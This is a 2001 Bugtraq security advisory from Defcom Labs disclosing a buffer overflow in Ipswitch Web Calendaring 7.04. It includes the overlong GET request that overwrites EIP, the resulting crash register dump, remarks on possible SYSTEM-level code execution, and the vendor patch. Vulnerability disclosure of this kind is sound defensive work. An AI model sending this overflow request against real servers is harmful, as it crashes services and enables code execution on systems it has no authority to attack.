From andreas.junestam@defcom.com Sun Oct 14 00:10:18 2001 From: andreas junestam To: bugtraq Date: Fri, 12 Oct 2001 13:04:16 +0200 Subject: def-2001-29 ====================================================================== Defcom Labs Advisory def-2001-29 Ipswitch Web Calendaring 7.04 Buffer Overflow Author: Andreas Junestam Release Date: 2001-10-12 ====================================================================== ------------------------=[Brief Description]=------------------------- When sending a request to the Web Calender (port 8484) longer than 97 bytes, a overflow will occur and EIP will be overwritten. ------------------------=[Affected Systems]=-------------------------- - Ipswitch Web Calendaring 7.04 and possibly earlier versions ----------------------=[Detailed Description]=------------------------ Sending a request like: GET /'A' x 96 HTTP/1.0 Generates: Access violation - code c0000005 (first chance) eax=07777101 ebx=00c338d8 ecx=016f99ec edx=016f99ec esi=0000007e edi=00000000 eip=61616161 esp=016f99fc ebp=61616161 61616161 ?? ??? This leaves us with the possibility to run code as SYSTEM. Mind though, the server does a ToLower on the buffer BEFORE the overflow occours, limiting the number of instructions we can use. ---------------------------=[Workaround]=----------------------------- Download the new version from: ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM704HF1.exe -------------------------=[Vendor Response]=-------------------------- This issue was brought to the vendors attention on the 1st of October, 2001. Patch is released. ====================================================================== This release was brought to you by Defcom Labs http://labs.defcom.com http://www.defcom.com ======================================================================